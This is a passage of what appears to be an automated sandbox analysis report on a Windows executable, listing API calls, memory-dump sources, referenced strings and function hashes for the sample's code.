                                                                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00DCCE4D
                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00DCCE50
                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00DCCE59
                                                                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00DCCE70
                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00DCCE73
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2014098862-0
                                                                                                                        • Opcode ID: 26b91f596700da0f45f48af3292886af95dcc9aaf76b982f5148e245b04b9f53
                                                                                                                        • Instruction ID: d32e485886672e1557593cfc3356b4873ecebfdf4f5cc7aa48c393186c18c728
                                                                                                                        • Opcode Fuzzy Hash: 26b91f596700da0f45f48af3292886af95dcc9aaf76b982f5148e245b04b9f53
                                                                                                                        • Instruction Fuzzy Hash: 8D11C4B1650618BEF7106F658C8EFAA7B2DDB48764F500419F3457B0E0C9F2AC519AB4
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DCA857: CLSIDFromProgID.COMBASE ref: 00DCA874
                                                                                                                          • Part of subcall function 00DCA857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00DCA88F
                                                                                                                          • Part of subcall function 00DCA857: lstrcmpiW.KERNEL32(?,00000000), ref: 00DCA89D
                                                                                                                          • Part of subcall function 00DCA857: CoTaskMemFree.COMBASE(00000000), ref: 00DCA8AD
                                                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00DEC6AD
                                                                                                                        • _memset.LIBCMT ref: 00DEC6BA
                                                                                                                        • _memset.LIBCMT ref: 00DEC7D8
                                                                                                                        • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 00DEC804
                                                                                                                        • CoTaskMemFree.COMBASE(?), ref: 00DEC80F
                                                                                                                        Strings
                                                                                                                        • NULL Pointer assignment, xrefs: 00DEC85D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                        • String ID: NULL Pointer assignment
                                                                                                                        • API String ID: 1300414916-2785691316
                                                                                                                        • Opcode ID: 28d8e97907f51162023a55a69e911d9999c15248742db1f4eb340d02be331075
                                                                                                                        • Instruction ID: 9584fa9f01fd9c3154e30e4e2eeb78b061bf3b1af33b8c51d312d058b0e659cc
                                                                                                                        • Opcode Fuzzy Hash: 28d8e97907f51162023a55a69e911d9999c15248742db1f4eb340d02be331075
                                                                                                                        • Instruction Fuzzy Hash: 56911871D00219ABDB11EFA5DC81EDEBBB9EF08710F20412AF519A7291DB709A45CFB0
                                                                                                                        APIs
                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00DF1B09
                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00DF1B17
                                                                                                                        • __wsplitpath.LIBCMT ref: 00DF1B45
                                                                                                                          • Part of subcall function 00DB297D: __wsplitpath_helper.LIBCMT ref: 00DB29BD
                                                                                                                        • _wcscat.LIBCMT ref: 00DF1B5A
                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00DF1BD0
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00DF1BE2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                        • String ID: hE
                                                                                                                        • API String ID: 1380811348-3080292677
                                                                                                                        • Opcode ID: c5c5f34216b6f29cdbd34087a2342e382552496afee0aa722e18f9a396da3f40
                                                                                                                        • Instruction ID: 8306e09429cbd826288984722757756da822636829c3a351b944e6a002c292db
                                                                                                                        • Opcode Fuzzy Hash: c5c5f34216b6f29cdbd34087a2342e382552496afee0aa722e18f9a396da3f40
                                                                                                                        • Instruction Fuzzy Hash: 3B516C75508304AFD710EF24C885EABB7E8EF89754F04491EF58A97251EB70EA04CBB2
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00DF9926
                                                                                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00DF993A
                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00DF9954
                                                                                                                        • _wcscat.LIBCMT ref: 00DF99AF
                                                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00DF99C6
                                                                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00DF99F4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window_wcscat
                                                                                                                        • String ID: SysListView32
                                                                                                                        • API String ID: 307300125-78025650
                                                                                                                        • Opcode ID: f55e712792857ab7610dc54cedebb0ec409e74094298311a89e8b7ca6de18d15
                                                                                                                        • Instruction ID: be26b522677b66e3d1fe24441b7ef3f91359f4c4f9fe2c489cf0a72c43076c0f
                                                                                                                        • Opcode Fuzzy Hash: f55e712792857ab7610dc54cedebb0ec409e74094298311a89e8b7ca6de18d15
                                                                                                                        • Instruction Fuzzy Hash: 0841A471D00348AFEF219F64CC95BEEB7A8EF08350F15842AF695E7191C6719D848B70
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DD6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00DD6F7D
                                                                                                                          • Part of subcall function 00DD6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00DD6F8D
                                                                                                                          • Part of subcall function 00DD6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00DD7022
                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DF168B
                                                                                                                        • GetLastError.KERNEL32 ref: 00DF169E
                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DF16CA
                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00DF1746
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 00DF1751
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00DF1786
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                        • String ID: SeDebugPrivilege
                                                                                                                        • API String ID: 2533919879-2896544425
                                                                                                                        • Opcode ID: b759481205e30c431033f7c1333a4ea239278548a3de166066c5ac56994bec26
                                                                                                                        • Instruction ID: c9c58eaef29a6a5de097ed27d10c5b87c378c72501a8e8cf6bd6b83fc9a9ce4e
                                                                                                                        • Opcode Fuzzy Hash: b759481205e30c431033f7c1333a4ea239278548a3de166066c5ac56994bec26
                                                                                                                        • Instruction Fuzzy Hash: 87418975A04205EFDB04EF54CCA6FBDB7A5AF54714F098049FA0A9F292DB74D8048BB1
                                                                                                                        APIs
                                                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00DD62D6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: IconLoad
                                                                                                                        • String ID: blank$info$question$stop$warning
                                                                                                                        • API String ID: 2457776203-404129466
                                                                                                                        • Opcode ID: 1b6b1a717be9c624ab166de2a3e31f8699326c6316cbe51ef347399e4bf3c4f8
                                                                                                                        • Instruction ID: 5d008c7d5e07197c49e3c0242afdd17ed1780ec700507d6ce29fdf8dd533af5b
                                                                                                                        • Opcode Fuzzy Hash: 1b6b1a717be9c624ab166de2a3e31f8699326c6316cbe51ef347399e4bf3c4f8
                                                                                                                        • Instruction Fuzzy Hash: AA11E735209343FEE7059A659C92DAA7B98DF16324B20002BF541B6382EBA0EA4085FC
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00DD7595
                                                                                                                        • LoadStringW.USER32(00000000), ref: 00DD759C
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00DD75B2
                                                                                                                        • LoadStringW.USER32(00000000), ref: 00DD75B9
                                                                                                                        • _wprintf.LIBCMT ref: 00DD75DF
                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00DD75FD
                                                                                                                        Strings
                                                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00DD75DA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                        • API String ID: 3648134473-3128320259
                                                                                                                        • Opcode ID: ec02051c6bf2705c4d25fbc64261101d9491c239dea4c31012299a38a45567ce
                                                                                                                        • Instruction ID: 2ff4fd8899f318300c13457a148853d5b59403dfcbca98a75084ddcd28d99031
                                                                                                                        • Opcode Fuzzy Hash: ec02051c6bf2705c4d25fbc64261101d9491c239dea4c31012299a38a45567ce
                                                                                                                        • Instruction Fuzzy Hash: 7F0136F2504208BFE711ABE5ED89EEB776CD704301F004496B746F2041EA789E888B75
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F
                                                                                                                          • Part of subcall function 00DF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DF2AA6,?,?), ref: 00DF3B0E
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DF2AE7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3479070676-0
                                                                                                                        • Opcode ID: b3c76d4d3ecc4aeaee729c6278a011cfb963c96ecea3fdc02022c6a227700489
                                                                                                                        • Instruction ID: 918a6354f48dc8cc49ef867fc29d77ac9b77563dda4fb61407f56e0372d870a8
                                                                                                                        • Opcode Fuzzy Hash: b3c76d4d3ecc4aeaee729c6278a011cfb963c96ecea3fdc02022c6a227700489
                                                                                                                        • Instruction Fuzzy Hash: 83917831604205AFCB01EF55C891B7EB7E5FF88314F09881DFA969B2A1DB31E945CB62
                                                                                                                        APIs
                                                                                                                        • select.WS2_32 ref: 00DE9B38
                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 00DE9B45
                                                                                                                        • __WSAFDIsSet.WS2_32(00000000,?), ref: 00DE9B6F
                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 00DE9B9F
                                                                                                                        • htons.WS2_32(?), ref: 00DE9C51
                                                                                                                        • inet_ntoa.WS2_32(?), ref: 00DE9C0C
                                                                                                                          • Part of subcall function 00DCE0F5: _strlen.LIBCMT ref: 00DCE0FF
                                                                                                                          • Part of subcall function 00DCE0F5: _memmove.LIBCMT ref: 00DCE121
                                                                                                                        • _strlen.LIBCMT ref: 00DE9CA7
                                                                                                                        • _memmove.LIBCMT ref: 00DE9D10
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3637404534-0
                                                                                                                        • Opcode ID: 385708acf6f13c8978cb4106822102c389101b9e27970da04e6dfcb0b6f12095
                                                                                                                        • Instruction ID: 76b52d7a0507e2d14a70d73491264a2ad8e7e601601be21b986391520cef5e91
                                                                                                                        • Opcode Fuzzy Hash: 385708acf6f13c8978cb4106822102c389101b9e27970da04e6dfcb0b6f12095
                                                                                                                        • Instruction Fuzzy Hash: 9681DD71508240AFCB10EF25CC95EABBBE8EF88724F144A2DF5559B291DB70D904CBB2
                                                                                                                        APIs
                                                                                                                        • __mtinitlocknum.LIBCMT ref: 00DBB744
                                                                                                                          • Part of subcall function 00DB8A0C: __FF_MSGBANNER.LIBCMT ref: 00DB8A21
                                                                                                                          • Part of subcall function 00DB8A0C: __NMSG_WRITE.LIBCMT ref: 00DB8A28
                                                                                                                          • Part of subcall function 00DB8A0C: __malloc_crt.LIBCMT ref: 00DB8A48
                                                                                                                        • __lock.LIBCMT ref: 00DBB757
                                                                                                                        • __lock.LIBCMT ref: 00DBB7A3
                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00E46948,00000018,00DC6C2B,?,00000000,00000109), ref: 00DBB7BF
                                                                                                                        • RtlEnterCriticalSection.NTDLL(8000000C), ref: 00DBB7DC
                                                                                                                        • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 00DBB7EC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1422805418-0
                                                                                                                        • Opcode ID: 1d8309d060570f79b21a75ddd86757a219556f40247660fc400b5c09c582b016
                                                                                                                        • Instruction ID: 3f0e2d86d99a0d35d136bcaaa8329a7819c6f4d33e3c47988e4bdb44bbff977b
                                                                                                                        • Opcode Fuzzy Hash: 1d8309d060570f79b21a75ddd86757a219556f40247660fc400b5c09c582b016
                                                                                                                        • Instruction Fuzzy Hash: A8411371D00315DBEB149F69D8443E8BBA4FF81335F14821AE426AB2D1CBB4D805CBB0
                                                                                                                        APIs
                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00DDA1CE
                                                                                                                          • Part of subcall function 00DB010A: std::exception::exception.LIBCMT ref: 00DB013E
                                                                                                                          • Part of subcall function 00DB010A: __CxxThrowException@8.LIBCMT ref: 00DB0153
                                                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00DDA205
                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00DDA221
                                                                                                                        • _memmove.LIBCMT ref: 00DDA26F
                                                                                                                        • _memmove.LIBCMT ref: 00DDA28C
                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00DDA29B
                                                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00DDA2B0
                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00DDA2CF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 256516436-0
                                                                                                                        • Opcode ID: 0f69b98967755d70eca3f89ba8e9fb0940157d9faede383acc765aab882da272
                                                                                                                        • Instruction ID: e1328a2ade2ca643b32211997da56c4aefdcdeef752c091e74d96a0de4174f8c
                                                                                                                        • Opcode Fuzzy Hash: 0f69b98967755d70eca3f89ba8e9fb0940157d9faede383acc765aab882da272
                                                                                                                        • Instruction Fuzzy Hash: 26318171A00205EFCB00EFA9DC85AAEBBB8EF45310B1480A5F905EB256D774DA55CB71
                                                                                                                        APIs
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00DF8CF3
                                                                                                                        • GetDC.USER32(00000000), ref: 00DF8CFB
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DF8D06
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00DF8D12
                                                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00DF8D4E
                                                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00DF8D5F
                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00DFBB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00DF8D99
                                                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00DF8DB9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3864802216-0
